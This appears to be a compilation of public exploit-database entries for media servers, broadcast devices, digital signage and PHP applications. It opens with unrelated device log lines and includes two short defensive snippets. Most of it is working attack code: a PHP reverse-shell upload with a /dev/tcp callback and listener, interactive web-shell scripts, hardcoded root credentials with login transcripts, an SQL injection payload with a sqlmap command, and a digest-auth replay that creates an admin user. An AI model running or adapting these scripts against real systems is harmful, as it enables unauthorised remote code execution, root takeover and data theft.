      Oct 14 09:19:32 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3113) Mount NAS verify: df /MP3/NAS000000003 2>/dev/null
      Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.397037 ('Update News Feed'): /home/arq/bin/widget/news_feed.py
      Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.401558 ('Update Stock Feed'): /home/arq/bin/widget/stock_feed.py
      Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/181) Skipping a command ('Check if squeezeplay was properly started'); condition doesn't match
      Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.408094 ('Probe for CP2101'): /home/arq/bin/cp2101_probe.sh
      Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.409664 ('Update Weather Feed'): /home/arq/bin/widget/weather_feed.py
      Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.413391 ('Check for Network Configuration changes'): /home/arq/bin/check_netconf.sh
      Oct 14 09:20:25 [warning] BrowserProtocolClient_15[pid 11532, tid -1544549520]: (pandoralist.py/282) No Pandora user configured.
      Oct 14 09:20:35 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681635.425757 ('Ask all currently-attached IMCs to answer a rollcall'): /home/arq/bin/imcRollcall.sh
      Oct 14 09:20:35 [debug] ini[pid 12089, tid -1251767440]: (iniengine.py/621) Setting MPP30345_STATUS:Rollcall to 1602681635.45
      ...
      ...
  15. # Exploit Title: ReQuest Serious Play F3 Media Server 7.0.3 - Remote Code Execution (Unauthenticated)
      # Exploit Author: LiquidWorm
      # Software Link: http://request.com/
      # Version: 3.0.0

      #!/usr/bin/env python3
      # -*- coding: utf-8 -*-
      #
      #
      # ReQuest Serious Play F3 Media Server 7.0.3 Unauthenticated Remote Code Execution
      #
      #
      # Vendor: ReQuest Serious Play LLC
      # Product web page: http://www.request.com
      # Affected version: 7.0.3.4968 (Pro)
      #                   7.0.2.4954
      #                   6.5.2.4954
      #                   6.4.2.4681
      #                   6.3.2.4203
      #                   2.0.1.823
      #
      # Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers
      # into a compact powerhouse. With the ability to add unlimited NAS devices, the
      # F3 can handle your entire family's media collection with ease.
      #
      # Desc: The ReQuest ARQ F3 web server suffers from an unauthenticated remote
      # code execution vulnerability. Abusing the hidden ReQuest Internal Utilities
      # page (/tools) from the services provided, an attacker can exploit the Quick
      # File Uploader (/tools/upload.html) page and upload PHP executable files that
      # results in remote code execution as the web server user.
      #
      # =============================================================================
      # lqwrm@metalgear:~/prive$ python3 ReQuest.py 192.168.1.17:3664 192.168.1.22 6161
      # Let's see waddup...
      # Good to go.
      # Starting handler on port 6161.
      # Writing callback file...
      # We got the dir: /75302IV29ZS1
      # Checking write status...
      # All is well John Spartan. Calling your listener...
      # Connection from 192.168.0.17:42057
      # You got shell.
      # id;uname -ro
      # uid=81(apache) gid=81(apache) groups=81(apache),666(arq)
      # 3.2.0-4-686-pae GNU/Linux
      # exit
      # *** Connection closed by remote host ***
      # lqwrm@metalgear:~/prive$
      # =============================================================================
      #
      # Tested on: ReQuest Serious Play® OS v7.0.1
      #            ReQuest Serious Play® OS v6.0.0
      #            Debian GNU/Linux 5.0
      #            Linux 3.2.0-4-686-pae
      #            Linux 2.6.36-request+lenny.5
      #            Apache/2.2.22
      #            Apache/2.2.9
      #            PHP/5.4.45
      #            PHP/5.2.6-1
      #
      #
      # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
      #                             Macedonian Information Security Research and Development Laboratory
      #                             Zero Science Lab - https://www.zeroscience.mk - @zeroscience
      #
      #
      # Advisory ID: ZSL-2020-5602
      # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5602.php
      #
      #
      # 01.08.2020
      #

      from time import sleep
      import threading######
      import telnetlib######
      import requests#######
      import socket#########
      import sys############
      import re#############

      class Manhattan:
          def __init__(self):
              self.secretagent = "Mushu"
              self.payload = None
              self.deploy = None
              self.rhost = None
              self.lhost = None
              self.lport = None

          def the_args(self):
              if len(sys.argv) != 4:
                  self.the_usage()
              else:
                  self.rhost = sys.argv[1]
                  self.lhost = sys.argv[2]
                  self.lport = int(sys.argv[3])
                  if not "http" in self.rhost:
                      self.rhost = "http://{}".format(self.rhost)

          def the_usage(self):
              self.the_wha()
              print("Usage: python3 {} [targetIP:targetPORT] [localIP] [localPORT]".format(sys.argv[0]))
              print("Example: python3 {} 192.168.0.91:3664 192.168.0.22 6161\n".format(sys.argv[0]))
              exit(0)

          def the_wha(self):
              titl = "ReQuest Serious Play F3 Media Server RCE"
              print(titl)

          def the_check(self):
              print("Let's see waddup...")
              try:
                  r = requests.get(self.rhost + "/MP3/")
                  if "000000000000" in r.text:
                      print("Good to go.")
                  else:
                      print("Something's fishy.")
                      exit(-16)
              except Exception as e:
                  print("Hmmm {msg}".format(msg=e))
                  exit(-1)

          def the_upload(self):
              print("Writing callback file...")
              self.headers = {"Cache-Control" : "max-age=0",
                              "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarylGyylNPXG5WMGCqP",
                              "User-Agent": self.secretagent,
                              "Accept" : "*/*",
                              "Accept-Encoding": "gzip, deflate",
                              "Accept-Language": "en-US,en;q=0.9",
                              "Connection": "close"}
              self.payload = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/" + self.lhost+ "/" +str(self.lport) + " <&1;rm bd0.php'\");"
              self.deploy = "------WebKitFormBoundarylGyylNPXG5WMGCqP\r\n"########
              self.deploy += "Content-Disposition: form-data; name=\"uploa" #
              self.deploy += "dedfile\"; filename=\"bd0.php\"\r\nContent-T" #
              self.deploy += "ype: application/octet-stream\r\n\r\n" + self.payload
              self.deploy += "\r\n------WebKitFormBoundarylGyylNPXG5WMGCqP\r\nConte"
              self.deploy += "nt-Disposition: form-data; name=\"location\"\r\n\r\nm"
              self.deploy += "p3\r\n------WebKitFormBoundarylGyylNPXG5WMGCqP--\r\n"
              requests.post(self.rhost+"/shared/upload.php", headers=self.headers, data=self.deploy)
              sleep(1)
              r = requests.get(self.rhost + "/MP3/")
              regex = re.findall(r'a\shref=\"(.*)\/\">', r.text)[2]
              print("We got the dir: /" + regex)
              print("Checking write status...")
              r = requests.get(self.rhost + "/MP3/" + regex)
              if "bd0" in r.text:
                  print("All is well John Spartan. Calling your listener...")
              else:
                  print("Something...isn't right.")
                  exit(-16)
              requests.get(self.rhost + "/MP3/"+ regex + "/bd0.php")

          def the_subp(self):
              konac = threading.Thread(name="ZSL", target=self.the_ear)
              konac.start()
              sleep(1)
              self.the_upload()

          def the_ear(self):
              telnetus = telnetlib.Telnet()
              print("Starting handler on port {}.".format(self.lport))
              s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
              s.bind(("0.0.0.0", self.lport))
              while True:
                  try:
                      s.settimeout(7)
                      s.listen(1)
                      conn, addr = s.accept()
                      print("Connection from {}:{}".format(addr[0], addr[1]))
                      telnetus.sock = conn
                  except socket.timeout as p:
                      print("Hmmm ({msg})".format(msg=p))
                      s.close()
                      exit(0)
                  break
              print("You got shell.")
              telnetus.interact()
              conn.close()

          def main(self):
              self.the_args()
              self.the_check()
              self.the_subp()

      if __name__ == '__main__':
          Manhattan().main()
  16. # Exploit Title: Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root
# Date: 2020-07-24
# Exploit Author: LiquidWorm
# Software Link: https://www.adtecdigital.com / https://www.adtecdigital.com/support/documents-downloads
# Version: Multiple

Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root


Vendor: Adtec Digital, Inc.
Product web page: https://www.adtecdigital.com
                  https://www.adtecdigital.com/support/documents-downloads
Affected version: SignEdje Digital Signage Player v2.08.28
                  mediaHUB HD-Pro High & Standard Definition MPEG2 Encoder v3.07.19
                  afiniti Multi-Carrier Platform v1905_11
                  EN-31 Dual Channel DSNG Encoder / Modulator v2.01.15
                  EN-210 Multi-CODEC 10-bit Encoder / Modulator v3.00.29
                  EN-200 1080p AVC Low Latency Encoder / Modulator v3.00.29
                  ED-71 10-bit / 1080p Integrated Receiver Decoder v2.02.24
                  edje-5110 Standard Definition MPEG2 Encoder v1.02.05
                  edje-4111 HD Digital Media Player v2.07.09
                  Soloist HD-Pro Broadcast Decoder v2.07.09
                  adManage Traffic & Media Management Application v2.5.4

Summary: Adtec Digital is a leading manufacturer of Broadcast, Cable and IPTV
products and solutions.

Desc: The devices utilize hard-coded and default credentials within their Linux
distribution image for Web/Telnet/SSH access. A remote attacker could exploit
this vulnerability by logging in with the default credentials to access the
web interface or to gain shell access as root.

Tested on: GNU/Linux 4.1.8 (armv7l)
           GNU/Linux 3.12.38 (PowerPC)
           GNU/Linux 2.6.14 (PowerPC)
           Adtec Embedded Linux 0.9 (fido)
           Apache


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5603
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5603.php


24.07.2020

--


Creds:
------

adtec:none:500:1000:adtec:/media:/bin/sh
admin:1admin!:502:502:admin:/home/admin:/bin/sh
root1:1root!:0:0:root:/root:/bin/sh
adtecftp:adtecftp2231


SSH:
----

login as: root
[email protected]'s password:
Successfully logged in. Thank you for choosing Adtec Digital products- we know you had a choice and we appreciate your decision!
root@targethostname:~# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

--

admin@targethostname:/$ id
uid=502(admin) gid=502(admin) groups=0(root),502(admin)
admin@targethostname:~$ id adtec
uid=500(adtec) gid=1000(users) groups=1000(users),72(apache)
admin@targethostname:~$ cat /etc/sudoers |grep -v "#"
root ALL=(ALL) ALL
apache ALL=(ALL) NOPASSWD: ALL


Telnet (API):
-------------

Adtec Resident Telnet Server...
UserName: adtec
adtec
PassWord: none

User adtec connected
*.SYSD SHELLCMD cat /etc/passwd
*.SYSD CMD cat /etc/passwd OK
root:he7TRuXjJjxfc:0:0:root:/root:/bin/sh
adtec:GC1BpYa80PaoY:500:1000:adtec:/media:/bin/sh
apache:!!:72:72:Apache Server:/dev/null:/sbin/nologin
fregd:!!:73:73:Freg Daemon:/dev/null:/sbin/nologin
ntp:!!:38:38:NTP Server:/dev/null:/sbin/nologin
syslogd:!!:74:74:Syslog Daemon:/dev/null:/sbin/nologin
admin:rDglOB38TVYRg:502:502:admin:/home/admin:/bin/sh
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
avahi:x:82:82:Avahi Daemon:/dev/null/:/sbin/nologin
avahi-autoipd:x:83:83:Avahi Autoipd:/dev/null/:/sbin/nologin
messagebus:x:81:81:Message Bus Daemon:/dev/null:/sbin/nologin
...
...
  17. # Exploit Title: TDM Digital Signage PC Player 4.1 - Insecure File Permissions
# Date: 2020-09-23
# Exploit Author: LiquidWorm
# Software Link: https://www.tdmsignage.com / https://pro.sony/en_NL/products/display-software/tdm-ds1y-tdm-ds3y
# Version: 4.1.0.4

Vendor: TDM [Trending Digital Marketing]
Product web page: https://www.tdmsignage.com
                  https://pro.sony/en_NL/products/display-software/tdm-ds1y-tdm-ds3y
Affected version: 4.1.0.4

Summary: With TDM you can do a lot more than just show Digital Signage. With
our Enterprise-Grade software you open the door to Interactive Signage,
Analytics, Proof of Play and a lot more.

Desc: TDM Digital Signage Windows Player suffers from an elevation of privileges
vulnerability which can be used by a simple authenticated user who can replace
the executable file with a binary of choice. The vulnerability exists due to
improper permissions, with the 'M' flag (Modify) or 'C' flag (Change) set for
the 'Authenticated Users' group.

Tested on: Microsoft Windows 10 Home


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5604
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5604.php


23.09.2020

--


C:\>icacls TDMSignage
TDMSignage BUILTIN\Administrators:(I)(OI)(CI)(F)
           NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
           BUILTIN\Users:(I)(OI)(CI)(RX)
           NT AUTHORITY\Authenticated Users:(I)(M) <---------<<<
           NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M) <---------<<<

Successfully processed 1 files; Failed processing 0 files

C:\TDMSignage>dir /b *.exe
Player.exe
unins000.exe

C:\TDMSignage>icacls Player.exe && icacls unins000.exe
Player.exe BUILTIN\Administrators:(I)(F)
           NT AUTHORITY\SYSTEM:(I)(F)
           BUILTIN\Users:(I)(RX)
           NT AUTHORITY\Authenticated Users:(I)(M) <---------<<<

Successfully processed 1 files; Failed processing 0 files
unins000.exe BUILTIN\Administrators:(I)(F)
             NT AUTHORITY\SYSTEM:(I)(F)
             BUILTIN\Users:(I)(RX)
             NT AUTHORITY\Authenticated Users:(I)(M) <---------<<<

Successfully processed 1 files; Failed processing 0 files
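The icacls listings above are the whole finding: an allow ACE that gives a group every local user belongs to the Modify right on an executable. The following is an added example, not part of the advisory, that parses icacls output and reports exactly those ACEs, so the check can be run over the output of `icacls` for a whole install directory (`icacls C:\App /t`) instead of read by eye. The sample text is constructed from the two listings quoted above with the arrow markers removed; the list of low-privileged principals and the write-granting rights are assumptions taken from the icacls documentation, not from the advisory.

```python
import re

# Constructed sample: the two icacls listings quoted in the advisory above,
# with the "<---------<<<" markers removed so the text parses as real output.
SAMPLE_ICACLS = r"""TDMSignage BUILTIN\Administrators:(I)(OI)(CI)(F)
           NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
           BUILTIN\Users:(I)(OI)(CI)(RX)
           NT AUTHORITY\Authenticated Users:(I)(M)
           NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)

Successfully processed 1 files; Failed processing 0 files

Player.exe BUILTIN\Administrators:(I)(F)
           NT AUTHORITY\SYSTEM:(I)(F)
           BUILTIN\Users:(I)(RX)
           NT AUTHORITY\Authenticated Users:(I)(M)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals every interactive or domain user belongs to (assumed list).
# Write access for them on an executable lets a standard user swap the binary.
LOW_PRIV_PRINCIPALS = {
    "NT AUTHORITY\\Authenticated Users",
    "BUILTIN\\Users",
    "Everyone",
    "NT AUTHORITY\\INTERACTIVE",
}
# icacls simple rights that imply write, and the specific rights that do.
WRITE_SIMPLE = {"F", "M", "W"}
WRITE_SPECIFIC = {"WD", "AD", "WA", "WEA", "DC", "D", "WDAC", "WO"}
INHERIT_TOKENS = {"I", "OI", "CI", "IO", "NP"}

PRINCIPAL = (r"(?:NT AUTHORITY|BUILTIN|NT SERVICE|CREATOR OWNER|"
             r"APPLICATION PACKAGE AUTHORITY|[A-Za-z0-9_.-]+)\\[^:\\]+|Everyone")
FLAGS = r"(?:\([^)]*\))+"
# The first line of a listing carries the path; continuation lines are indented.
FIRST_RE = re.compile(rf"^(?P<path>.+?)\s+(?P<principal>{PRINCIPAL}):(?P<flags>{FLAGS})\s*$")
CONT_RE = re.compile(rf"^\s+(?P<principal>{PRINCIPAL}):(?P<flags>{FLAGS})\s*$")


def parse_flags(flags):
    """Split '(I)(OI)(M)' into the set of rights it grants and a deny marker."""
    rights, deny = set(), False
    for tok in re.findall(r"\(([^)]*)\)", flags):
        if tok == "DENY":
            deny = True
        elif tok not in INHERIT_TOKENS:
            rights.update(t.strip() for t in tok.split(","))
    return rights, deny


def grants_write(rights):
    return bool(rights & WRITE_SIMPLE) or bool(rights & WRITE_SPECIFIC)


def find_weak_aces(text):
    """Return (path, principal, rights) for every allow ACE that gives a
    low-privileged group write access to the object."""
    findings, current_path = [], None
    for line in text.splitlines():
        if not line.strip():
            continue
        m = CONT_RE.match(line) if line[0].isspace() else FIRST_RE.match(line)
        if not m:
            continue  # summary lines such as "Successfully processed ..."
        if m.groupdict().get("path"):
            current_path = m.group("path")
        rights, deny = parse_flags(m.group("flags"))
        principal = m.group("principal")
        if not deny and principal in LOW_PRIV_PRINCIPALS and grants_write(rights):
            findings.append((current_path, principal, sorted(rights)))
    return findings


if __name__ == "__main__":
    for path, who, rights in find_weak_aces(SAMPLE_ICACLS):
        print(f"{path}: {who} has {','.join(rights)}")
```

Deny ACEs are skipped because they never grant access, and inheritance markers are ignored because they do not change what the ACE allows. The fix on the product side is the usual one: install under Program Files with inherited ACLs, or remove the Modify grant with `icacls <dir> /remove:g "Authenticated Users" /t`.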
  18. # Exploit Title: Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated)
# Date: 26/10/2020
# Exploit Author: Gurkirat Singh <[email protected]>
# Vendor Homepage: http://www.sentrifugo.com/
# POC Link: https://www.exploit-db.com/exploits/47323
# Version: 3.2
# Tested on: Linux and Windows
# CVE : CVE-2019-15813
# Contact Details: https://google.com/search?q=tbhaxor

from argparse import ArgumentParser, RawTextHelpFormatter
from bs4 import BeautifulSoup, Tag
from requests.sessions import Session
import tempfile as tmp
import os.path as path
import random
import string
from huepy import *

parser = ArgumentParser(description="Exploit for CVE-2019-15813", formatter_class=RawTextHelpFormatter)
parser.add_argument("--target", "-t", help="target uri where application is installed", required=True, metavar="", dest="t")
parser.add_argument("--user", "-u", help="username to authenticate", required=True, metavar="", dest="u")
parser.add_argument("--password", "-p", help="password to authenticate", required=True, metavar="", dest="p")
args = parser.parse_args()

if args.t.endswith("/"):
    args.t = args.t[:-1]

F = "".join(random.choices(string.ascii_letters, k=13)) + ".php"

with Session() as http:
    print(run("Logging in"))
    data = {"username": args.u, "password": args.p}
    r = http.post(args.t + "/index.php/index/loginpopupsave", data=data, allow_redirects=False)
    if not (r.headers.get("Location", "").endswith("welcome") or r.headers.get("Location", "").endswith("welcome/")):
        print(bad("Unable to login. Check username / password"))
        exit(1)
    print(good("Logged in"))

    print(run("Exploiting"))
    files = {"myfile": ("shell.php", "<?php system($_POST['cmd']); ?>")}
    r = http.post(args.t + "/index.php/policydocuments/uploaddoc", files=files)
    if r.status_code != 200:
        print(bad("Unable to upload file"))
        exit(1)
    file_name = r.json()["filedata"]["new_name"]

    print(info("Spawning shell"))
    user = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name, data={"cmd": "whoami"})
    host = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name, data={"cmd": "cat /etc/hostname"})
    shell = f"{lightgreen('%s@%s'%(user.content.decode().strip(), host.content.decode().strip()))}{blue('$ ')}"
    while True:
        try:
            cmd = input(shell)
            if cmd == "exit":
                break
            r = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name, data={"cmd": cmd})
            print(r.content.decode().strip())
        except Exception as e:
            print()
            break

    print(run("Cleaning"))
    http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name, data={"cmd": "rm %s" % file_name})
    r = http.get(args.t + "/public/uploads/policy_doc_temp/" + file_name)
    if r.status_code == 404:
        print(good("Cleaned"))
    else:
        print(bad("Unable to clean the file"))
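Entries 15 and 18 share one root cause: an upload handler that keeps the client's file name and extension and stores the file under a web-served directory where PHP executes. The following added example (not code from either project) shows the server-side checks that stop both PoCs: the stored name is chosen by the server, the extension is taken from an allowlist, the leading bytes must match that extension, and the file is written with O_EXCL. The sample uploads are constructed from the two payloads quoted above; the allowlist and the assumption that `upload_dir` lies outside the document root are mine, and the client-supplied Content-Type is deliberately never consulted.

```python
import os
import secrets
import tempfile

# Allowed extensions and the leading bytes a genuine file of that type starts
# with (assumed allowlist). Anything else is refused, whatever the client claims.
ALLOWED_TYPES = {
    "pdf": (b"%PDF-",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}


def validate_upload(filename, content):
    """Return (safe_name, reason). safe_name is None when the upload is refused."""
    # Strip any directory part the client sent (../, C:\, ...).
    base = os.path.basename(filename.replace("\\", "/"))
    if "." not in base:
        return None, "no extension"
    ext = base.rsplit(".", 1)[1].lower()          # the last extension decides
    if ext not in ALLOWED_TYPES:
        return None, f"extension .{ext} not allowed"
    if not any(content.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return None, "content does not match extension"
    # Server-chosen random name: the client never controls the stored path.
    return f"{secrets.token_hex(16)}.{ext}", "ok"


def save_upload(upload_dir, filename, content):
    """Validate, then write with O_EXCL so an existing file is never replaced.
    upload_dir is assumed to be outside the document root (or served with
    script execution disabled)."""
    name, reason = validate_upload(filename, content)
    if name is None:
        return None, reason
    dest = os.path.join(upload_dir, name)
    fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as f:
        f.write(content)
    return dest, "ok"


def demo():
    """Run the constructed cases through save_upload and return each verdict."""
    cases = {
        "php": ("shell.php", b"<?php system($_POST['cmd']); ?>"),   # Sentrifugo payload
        "renamed": ("bd0.pdf", b"<?php exec('id'); ?>"),             # PHP disguised as PDF
        "double": ("report.pdf.php", b"%PDF-1.4\n"),                 # last extension wins
        "traversal": ("../../report.pdf", b"%PDF-1.4\n%...\n"),     # directory part dropped
    }
    with tempfile.TemporaryDirectory() as d:
        return {k: save_upload(d, *v)[1] for k, v in cases.items()}


if __name__ == "__main__":
    for case, verdict in demo().items():
        print(f"{case}: {verdict}")
```

The magic-byte check is what defeats the "rename the shell to .pdf" variant; the allowlist is what defeats `.php`, `.phtml` and double extensions; the random name and the non-executable directory are what make a polyglot file harmless even if both checks were wrong.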
  19. # Exploit Title: Client Management System 1.0 - 'searchdata' SQL injection
# Date: 26/10/2020
# Exploit Author: Serkan Sancar
# Vendor Homepage: https://phpgurukul.com/client-management-system-using-php-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10841
# Version: 1.0
# Tested On: Windows 7 Enterprise SP1 + XAMPP V3.2.3

Step 1: Open the URL http://localhost/clientms/client/index.php
Step 2: Log in as a client user on the panel
Step 3: Use the SQL injection test payload 1' or 1=1# in the searchbox field

Malicious Request on Burp Suite

POST /clientms/client/search-invoices.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/clientms/client/search-invoices.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 210
Origin: http://localhost
Connection: close
Cookie: PHPSESSID=q38d8f3sveqjciu02csdfem453
Upgrade-Insecure-Requests: 1

searchdata=1%27+or+1%3D1%23&search=

Step 4: All invoices will be listed, which confirms the SQL injection on the panel.

Example of another method: save the intercepted request from Burp Suite to a file; exploitation is easier with sqlmap's -r parameter.

sqlmap -r cms.txt --risk=1 --level=1 --dbms=mysql --dbs
  20. # Exploit Title: Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated)
# Google Dork: intitle:"Sphider Admin Login"
# Date: 2014-07-28
# Exploit Author: Gurkirat Singh
# Vendor Homepage: http://www.sphider.eu/
# Software Link: http://www.sphider.eu/sphider-1.3.6.zip
# Version: v1.3.6
# Tested on: Windows and Linux
# CVE : CVE-2014-5194
# Proof of Concept: https://www.exploit-db.com/exploits/34189

from argparse import ArgumentParser, RawTextHelpFormatter
from huepy import *
import string
import random
from bs4 import BeautifulSoup, Tag
from requests import Session
from randua import generate as randua

_F = "".join(random.choices(string.ascii_letters, k=13))

parser = ArgumentParser(description="Exploit for CVE-2014-5194", formatter_class=RawTextHelpFormatter)
parser.add_argument("--target", "-t", help="target uri where application is installed", required=True, metavar="", dest="t")
parser.add_argument("--user", "-u", help="username to authenticate", required=True, metavar="", dest="u")
parser.add_argument("--password", "-p", help="password to authenticate", required=True, metavar="", dest="p")
parser.add_argument("--debug", help="if passed, spawn the firefox window", default=True, action="store_false")
parser.add_argument("--timeout", help="timeout in seconds (default: 1)", dest="T", metavar="", default=1)
args = parser.parse_args()

if args.t.endswith("/"):
    args.t = args.t[:-1]

print(run("Logging in"))
with Session() as http:
    data = {"user": args.u, "pass": args.p}
    headers = {"User-Agent": randua()}
    http.post(args.t + '/admin/auth.php', data=data, headers=headers, allow_redirects=False)
    r = http.get(args.t + '/admin/admin.php', headers=headers, allow_redirects=False)
    html = BeautifulSoup(r.content.decode(), "lxml")
    title: Tag = html.find("title")
    if title.text == "Sphider Admin Login":
        print(bad("Failed to login"))
        exit(1)
    else:
        print(good("Logged in"))

    payload = {
        'f': 'settings',
        'Submit': '1',
        '_version_nr': '1.3.5',
        '_language': 'en',
        '_template': 'standard',
        '_admin_email': 'admin@localhost',
        '_print_results': '1',
        '_tmp_dir': 'tmp',
        '_log_dir': 'log',
        '_log_format': 'html',
        '_min_words_per_page': '10',
        '_min_word_length': '3',
        '_word_upper_bound': '100;system($_POST[cmd])',
        '_index_numbers': '1',
        '_index_meta_keywords': '1',
        '_pdftotext_path': 'c:\\temp\\pdftotext.exe',
        '_catdoc_path': 'c:\\temp\\catdoc.exe',
        '_xls2csv_path': 'c:\\temp\\xls2csv',
        '_catppt_path': 'c:\\temp\\catppt',
        '_user_agent': 'Sphider',
        '_min_delay': '0',
        '_strip_sessids': '1',
        '_results_per_page': '10',
        '_cat_columns': '2',
        '_bound_search_result': '0',
        '_length_of_link_desc': '0',
        '_links_to_next': '9',
        '_show_meta_description': '1',
        '_show_query_scores': '1',
        '_show_categories': '1',
        '_desc_length': '250',
        '_did_you_mean_enabled': '1',
        '_suggest_enabled': '1',
        '_suggest_history': '1',
        '_suggest_rows': '10',
        '_title_weight': '20',
        '_domain_weight': '60',
        '_path_weight': '10',
        '_meta_weight': '5'
    }

    print(run("Exploiting"))
    http.post(args.t + "/admin/admin.php", data=payload)
    r = http.post(args.t + "/settings/conf.php", data={"cmd": "echo %s" % _F})
    if r.content.decode().strip() != _F:
        print(bad("Failed"))
        exit(1)
    print(good("Exploited"))

    print(info("Spawning Shell"))
    user = http.post(args.t + "/settings/conf.php", data={"cmd": "whoami"})
    host = http.post(args.t + "/settings/conf.php", data={"cmd": "cat /etc/hostname"})
    shell = f"{lightgreen('%s@%s'%(user.content.decode().strip(), host.content.decode().strip()))}{blue('$ ')}"
    while True:
        try:
            cmd = input(shell)
            if cmd == "exit":
                break
            r = http.post(args.t + "/settings/conf.php", data={"cmd": cmd})
            print(r.content.decode().strip())
        except:
            break
    print()
  21. # Exploit Title: GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse
# Date: 2019-08-29
# Exploit Author: LiquidWorm
# Software Link: https://www.embedthis.com
# Version: 5.1.1

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# EmbedThis GoAhead Web Server 5.1.1 Digest Authentication Capture Replay Nonce Reuse
#
#
# Vendor: Embedthis Software LLC
# Product web page: https://www.embedthis.com
# Affected version: <=5.1.1 and <=4.1.2
# Fixed version: >=5.1.2 and >=4.1.3
#
# Summary: GoAhead is the world's most popular, tiny embedded web server. It is compact,
# secure and simple to use. GoAhead is deployed in hundreds of millions of devices and is
# ideal for the smallest of embedded devices.
#
# Desc: A security vulnerability affecting GoAhead versions 2 to 5 has been identified when
# using Digest authentication over HTTP. The HTTP Digest Authentication in the GoAhead web
# server does not completely protect against replay attacks. This allows an unauthenticated
# remote attacker to bypass authentication via capture-replay if TLS is not used to protect
# the underlying communication channel. Digest authentication uses a "nonce" value to mitigate
# replay attacks. GoAhead versions 3 to 5 validated the nonce with a fixed duration of 5 minutes
# which permitted short-period replays. This duration is too long for most implementations.
#
# Tested on: GoAhead-http
#            GoAhead-Webs
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2020-5598
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5598.php
#
# CVE ID: CVE-2020-15688
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15688
#          https://nvd.nist.gov/vuln/detail/CVE-2020-15688
#
# CWE ID: CWE-294 Authentication Bypass by Capture-replay
# CWE URL: https://cwe.mitre.org/data/definitions/294.html
#
# CWE ID: CWE-323: Reusing a Nonce, Key Pair in Encryption
# CWE URL: https://cwe.mitre.org/data/definitions/323.html
#
# GoAhead Security Alerts / Fix:
# https://github.com/embedthis/goahead-gpl/issues/3
# https://github.com/embedthis/goahead-gpl/issues/2
# https://github.com/embedthis/goahead-gpl/commit/fe0662f945bd7e24b8d621929e1b93d8a7f3f08f#diff-0988df549d878c849d7f2c073319bcb2
#
#
# 29.08.2019
#
#
# PoC for a network controller running GoAhead web server.
# Replay Authentication Bypass / Create Admin User
#

import requests
import sys

if (len(sys.argv) <= 1):
    print("Usage: ./nen.py <ipaddress>")
    exit(0)

ip = sys.argv[1]
url = "http://"+ip+"/goform/formUserManagementAdd?lang=en"
kolache = {"lang":"en"}

replay = "Digest username=\"admin\", "
replay += "realm=\"GoAhead\", "
replay += "nonce=\"5fb3ce6dec423bf8b8f0dfc8cf65244d\", "
replay += "uri=\"/goform/formUserManagementAdd?lang=en\", "
replay += "algorithm=MD5, "
replay += "response=\"1c05f4d08aa0cfcc5318882e0fb4e9af\", "
replay += "opaque=\"5ccc069c403ebaf9f0171e9517f40e41\", "
replay += "qop=auth, "
replay += "nc=0000000a, "
replay += "cnonce=\"0649f631320f23bb\""

headers = {"Cache-Control": "max-age=0",
           "Authorization": replay,
           "Content-Type": "application/x-www-form-urlencoded",
           "User-Agent": "NoProxy/NoProblem.251",
           "Accept-Encoding": "gzip, deflate",
           "Accept-Language": "mk-MK;q=0.9,mk;q=0.8",
           "Connection": "close"}

